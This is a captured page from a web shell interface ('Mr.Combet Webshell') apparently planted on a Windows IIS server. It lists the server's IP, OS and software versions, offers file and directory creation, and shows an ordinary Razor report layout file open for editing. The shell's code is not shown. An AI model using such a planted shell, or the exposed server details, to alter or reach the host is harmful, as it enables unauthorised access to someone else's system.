Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
inetpub
/
wwwroot
/
mapqa_bak
/
mapqa
/
Views
/
Shared
/
Edit File Name :
_ReportLayout.cshtml
@{ Layout = null; } <!DOCTYPE html> <html> <head> <title>@ViewBag.ReportTitle </title> <meta http-equiv=Content-Type content="text/html; charset=utf-8"> @Styles.Render("~/Content/css") @Scripts.Render("~/bundles/jquery") @*<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet">*@ <style type="text/css"> .table { margin-bottom: 2px; border: 1px solid; } .no-gutter { margin: 0; padding: 0; } body { font-family: 'Open Sans', sans-serif; font-size: 13px; background: white; padding: 15px; } .breakhere { page-break-after: always; } </style> @RenderSection("ReportStyles", false) </head> <body> <div class="container"> @RenderBody() </div> @Scripts.Render("~/bundles/bootstrap") @RenderSection("ReportScripts", false) </body> </html>
Save